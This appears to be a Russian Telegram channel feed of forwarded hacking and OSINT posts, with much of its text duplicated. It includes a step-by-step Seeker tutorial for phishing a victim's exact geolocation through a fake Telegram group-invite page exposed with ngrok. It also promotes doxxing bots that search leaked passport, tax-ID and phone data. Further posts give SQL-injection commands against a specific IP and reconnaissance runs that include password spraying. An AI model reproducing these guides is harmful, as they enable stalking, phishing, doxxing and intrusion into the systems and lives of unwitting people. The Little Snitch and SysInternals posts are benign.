Forwarded from Codeby
Seeker
Seeker - инструмент для определения точного местонахождения человека. Модель походит на фишинговую, жертве отправляется специальная ссылка по которой ей нужно перейти, затем он попадает на сайт и тогда нужно чтобы жертва разрешила доступ к геолокации в контекстном окошке браузера, если жертва не знает английский, это нам на руку.
Создаем фейковую страницу приглашения в беседу для telegram, название ей "Выпускники 11 "А".
🔸 Установка утилиты
🔸 Запуск
Далее заполняем шаблон и подкручиваем клиент, можно использовать ngrok, но будьте аккуратны,
🔸 Установка ngrok
🔸 Далее создаём аккаунт и регистрируем автотокен, его можно найти у себя на аккаунте
Отлично! Теперь командой ниже, запускаем клиент и можно отправлять ссылку любому человеку.
Seeker - инструмент для определения точного местонахождения человека. Модель походит на фишинговую, жертве отправляется специальная ссылка по которой ей нужно перейти, затем он попадает на сайт и тогда нужно чтобы жертва разрешила доступ к геолокации в контекстном окошке браузера, если жертва не знает английский, это нам на руку.
Создаем фейковую страницу приглашения в беседу для telegram, название ей "Выпускники 11 "А".
git clone https://github.com/thewhiteh4t/seeker
cd seeker/
python3 seeker.py
Далее заполняем шаблон и подкручиваем клиент, можно использовать ngrok, но будьте аккуратны,
ngrok строго относится к тому, что на нём запускают.
Скачиваем архив и командой разорхивируем его: sudo tar -xvzf ~/Downloads/ngrok.tgz -C /usr/local/bin
ngrok config add-authtoken <token>
Отлично! Теперь командой ниже, запускаем клиент и можно отправлять ссылку любому человеку.
ngrok http 8080
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
🗿3👍1
Forwarded from Интернет-Розыск
Please open Telegram to view this post
VIEW IN TELEGRAM
Forwarded from C.I.T. Security
http://search4faces.com/tt00
Reverse image search in database of more than 98 millions #TikTok avatars.
#oldstuff #osint #socmint
Reverse image search in database of more than 98 millions #TikTok avatars.
#oldstuff #osint #socmint
🔥2
Forwarded from GitHub Community
telegram-phone-number-checker — инструмент/скрипт Python для проверки, подключены ли номера телефонов к аккаунтам Telegram. Получение имени пользователя, имени и идентификаторов, если они доступны.
4️⃣ GitHub
Please open Telegram to view this post
VIEW IN TELEGRAM
🔥3
Forwarded from Codeby
В новой статье мы покажем два подхода, которые используют OSINT-специалисты для сбора информации в VK. На примере реального кейса разберём, как можно получить максимум данных, начиная с простого никнейма или фотографии.
на обновленном курсе Академии здесь
Please open Telegram to view this post
VIEW IN TELEGRAM
👍2
Forwarded from Dark Help
✨Собрал Лучших ботов для пробива в Telegram!✨
📊sherl0ck - Бот ищет данные по: номеру, почте, ФИО, СНИЛС, ИНН, авто, IP, паспорт, Telegram, ВК, карта.📱
🔮Оракул - Самый мощный бот для пробива! Находит всё, от телефонов до соцсетей. Рекомендую приобрести подписку - идеально подходит для поиска по номеру и многому другому!💎
🔎Quick OSINT - Узнай данные человека. Первые 2 запроса бесплатно!🔥
🔎Leak OSINT - Пробный доступ на неделю для поиска по ФИО, телефону, email и паспорту. 🎁
🚓UsersBox - Надежный бот с более 17 млрд записей. Ищет по имени, email, телефону и др.🚀
💼Himera - Бот с большой базой данных для поиска по ФИО, телефону, почте, и др. Подписка стоит недешево, но базы в боте очень редкие.📈
📊FunStat - Ищет аккаунты Telegram, Находит активность, чаты, телефоны, и статистику!📱
📊sherl0ck - Бот ищет данные по: номеру, почте, ФИО, СНИЛС, ИНН, авто, IP, паспорт, Telegram, ВК, карта.📱
🔮Оракул - Самый мощный бот для пробива! Находит всё, от телефонов до соцсетей. Рекомендую приобрести подписку - идеально подходит для поиска по номеру и многому другому!💎
🔎Quick OSINT - Узнай данные человека. Первые 2 запроса бесплатно!🔥
🔎Leak OSINT - Пробный доступ на неделю для поиска по ФИО, телефону, email и паспорту. 🎁
🚓UsersBox - Надежный бот с более 17 млрд записей. Ищет по имени, email, телефону и др.🚀
💼Himera - Бот с большой базой данных для поиска по ФИО, телефону, почте, и др. Подписка стоит недешево, но базы в боте очень редкие.📈
📊FunStat - Ищет аккаунты Telegram, Находит активность, чаты, телефоны, и статистику!📱
👍8🔥4🆒1
Forwarded from Investigation & Forensic TOOLS (Beholder Is Here)
Шпаргалки BeholderIsHere email.pdf
3.9 MB
ПОИСК ПО EMAIL. ИНСТРУМЕНТАРИЙ:
Анализ заголовка письма
🖥MXToolbox.com
Сервисы поиска по утечкам сетевых сервисов.
🖥 haveibeenpwned.com
🖥 monitor.mozilla.org
🖥 intelx.io
Сервисы поиска корпоративной электронной почты.
🖥 hunter.io
🖥 www.skymem.info
Поиск в сети
💻 https://github.com/megadose/holehe
Привязка почты к интернет сервисам
🖥 www.infoga.io
информация об учетных записях по электронной почте из общедоступных источников (поисковые системы, серверы ключей PGP, Shodan)
💻 Dorks
📑site:xxxxx intext:yyyyy@yy.yy
Поиск электронной почты на страницах определенного сайта
Анализ заголовка письма
🖥MXToolbox.com
Сервисы поиска по утечкам сетевых сервисов.
🖥 haveibeenpwned.com
🖥 monitor.mozilla.org
🖥 intelx.io
Сервисы поиска корпоративной электронной почты.
🖥 hunter.io
🖥 www.skymem.info
Поиск в сети
💻 https://github.com/megadose/holehe
Привязка почты к интернет сервисам
🖥 www.infoga.io
информация об учетных записях по электронной почте из общедоступных источников (поисковые системы, серверы ключей PGP, Shodan)
💻 Dorks
📑site:xxxxx intext:yyyyy@yy.yy
Поиск электронной почты на страницах определенного сайта
👍1
Forwarded from Codeby
Поддерживаемые техники:
Boolean based
Error Based
Time Based
Stacked Queries
Поддерживаемые СУБД:
MySQL
Microsoft SQL Server
Postgres
Oracle
Поддерживаемые типы:
GET/POST
Headers
Cookies
Mulitipart Form data
JSON
SOAP/XML
Добавлена поддержка:
--sql-shell --proxygit clone https://github.com/r0oth3x49/ghauri.git
python3 -m pip install --upgrade -r requirements.txt
python3 setup.py install
ghauri -u 'http://62.173.140.174:16015/user.php?login=asd&password=asd' --batch -v 2 --dbs
Please open Telegram to view this post
VIEW IN TELEGRAM
👍4
Forwarded from Пентестинг. Этичный хакинг.
🔍 Инструмент для пентеста: Little Snitch – наблюдение за сетевой активностью и контроль соединений на macOS 🔍
Little Snitch – это редкий, но очень полезный инструмент для специалистов по информационной безопасности, особенно тех, кто работает на macOS. Первоначально созданный как персональный фаервол, он позволяет получать полное представление о том, какие соединения устанавливаются приложениями, и дает возможность блокировать или разрешать их в реальном времени.
🔹 Почему Little Snitch полезен для пентеста?
Мониторинг сетевой активности в реальном времени: Удобный интерфейс показывает все активные соединения и позволяет быстро реагировать на подозрительную активность.
Контроль исходящих соединений: Позволяет видеть, когда и куда отправляются данные из вашей системы. Это важно для проверки на утечки данных или активность вредоносного ПО.
Создание детализированных правил: Можно настроить правила для конкретных приложений, IP-адресов или портов, что делает инструмент очень гибким для задач мониторинга.
Уведомления о подозрительных соединениях: Little Snitch сразу сигнализирует о попытках подключения, позволяя быстро обнаруживать нетипичное поведение.
🔹 Как можно использовать Little Snitch в пентесте?
Обнаружение вредоносной активности: Выявление подозрительных соединений или программ, отправляющих данные на неизвестные серверы.
Анализ трафика при тестировании программ: Если вам нужно понять, куда и как приложение отправляет данные, Little Snitch позволит отследить эти соединения.
Поиск утечек данных: Проверка на наличие отправки конфиденциальной информации без разрешения пользователя.
Изучение поведения приложений: Понимание, какие внешние соединения инициируют приложения, позволяет выявлять зависимости и сторонние сервисы.
🔹 Пример использования:
При установке нового приложения можно использовать Little Snitch, чтобы отследить, какие запросы оно отправляет в интернет. В случае, если приложение обращается к подозрительным серверам, вы сразу получите уведомление и сможете заблокировать соединение.
Little Snitch – полезный инструмент для пентестеров, работающих на macOS, который предоставляет контроль над сетевой активностью и помогает выявлять подозрительные соединения на этапе тестирования безопасности
Little Snitch – это редкий, но очень полезный инструмент для специалистов по информационной безопасности, особенно тех, кто работает на macOS. Первоначально созданный как персональный фаервол, он позволяет получать полное представление о том, какие соединения устанавливаются приложениями, и дает возможность блокировать или разрешать их в реальном времени.
🔹 Почему Little Snitch полезен для пентеста?
Мониторинг сетевой активности в реальном времени: Удобный интерфейс показывает все активные соединения и позволяет быстро реагировать на подозрительную активность.
Контроль исходящих соединений: Позволяет видеть, когда и куда отправляются данные из вашей системы. Это важно для проверки на утечки данных или активность вредоносного ПО.
Создание детализированных правил: Можно настроить правила для конкретных приложений, IP-адресов или портов, что делает инструмент очень гибким для задач мониторинга.
Уведомления о подозрительных соединениях: Little Snitch сразу сигнализирует о попытках подключения, позволяя быстро обнаруживать нетипичное поведение.
🔹 Как можно использовать Little Snitch в пентесте?
Обнаружение вредоносной активности: Выявление подозрительных соединений или программ, отправляющих данные на неизвестные серверы.
Анализ трафика при тестировании программ: Если вам нужно понять, куда и как приложение отправляет данные, Little Snitch позволит отследить эти соединения.
Поиск утечек данных: Проверка на наличие отправки конфиденциальной информации без разрешения пользователя.
Изучение поведения приложений: Понимание, какие внешние соединения инициируют приложения, позволяет выявлять зависимости и сторонние сервисы.
🔹 Пример использования:
При установке нового приложения можно использовать Little Snitch, чтобы отследить, какие запросы оно отправляет в интернет. В случае, если приложение обращается к подозрительным серверам, вы сразу получите уведомление и сможете заблокировать соединение.
Little Snitch – полезный инструмент для пентестеров, работающих на macOS, который предоставляет контроль над сетевой активностью и помогает выявлять подозрительные соединения на этапе тестирования безопасности
👍1
Forwarded from Интернет-Розыск
Please open Telegram to view this post
VIEW IN TELEGRAM
Forwarded from Codeby
Инструмент все в одном для автоматического исследования хоста путем запуска наилучшего набора средств сканирования и обнаружения уязвимостей
git clone https://github.com/six2dez/reconftw
cd reconftw/
./install.sh
./reconftw.sh -d target.com -r
# Single Target
sudo ./reconftw.sh -d target.com -r
# List of Targets
sudo ./reconftw.sh -l sites.txt -r -o /output/directory/
# Yolo mod (all tasks)
sudo ./reconftw.sh -d target.com -a
#Deep scan
./reconftw.sh -d target.com -r --deep -o /output/directory/
# Recon in a multi domain target
./reconftw.sh -m company -l domains_list.txt -r
# Osint
Domain information
Emails addresses and passwords leaks
Metadata finder
API leaks search
# Subdomains
Certificate transparency
NOERROR subdomain discovery
Bruteforce
Permutations
JS files & Source Code Scraping
DNS Records
# Hosts
IP info
CDN checker
WAF checker
Port Scanner
Port services vulnerability checks
Password spraying
Geolocalization info
# Webs
Web Prober
Web screenshoting
Web templates scanner
CMS Scanner
Url extraction
Favicon Real IP
Fuzzing
Wordlist generation
Passwords dictionary creation
# Vulnerability checks
XSS
Open redirect
SSRF
CRLF
Cors
LFI Checks
SQLi Check
SSTI
SSL tests
4XX Bypasser
Please open Telegram to view this post
VIEW IN TELEGRAM
👍2
Forwarded from IT MEGA облако
Информационная безопасность.7z.005
67.9 MB
Информационная безопасность. [ВМК МГУ, Яндекс]
#информационная_безопасность #OSINT #forensics
#тестирование_на_проникновение #Тестирование_ПО
IT MEGA
#информационная_безопасность #OSINT #forensics
#тестирование_на_проникновение #Тестирование_ПО
IT MEGA
👍1
Forwarded from S.E.Book
• Набор инструментов SysInternals — это набор приложений Windows, которые можно бесплатно загрузить из соответствующего раздела веб-сайта Microsoft. В этой серии статей вы познакомитесь с каждым из важных инструментов в комплекте, познакомитесь с ними и их многочисленными функциями, а затем эти инструкции помогут понять, как использовать их в реальных условиях:
- Что такое инструменты SysInternals и как их использовать?
- Знакомство с Process Explorer;
- Использование Process Explorer для устранения неполадок и диагностики;
- Понимание Process Monitor;
- Как пользоваться Process Monitor для устранения неполадок и нахождения скрытых ключей реестра;
- Использование Autoruns для работы с автоматически запускаемыми процессами и вредоносным ПО.
#SysInternals #Windows #soft
Please open Telegram to view this post
VIEW IN TELEGRAM
Forwarded from Интернет-Розыск
Please open Telegram to view this post
VIEW IN TELEGRAM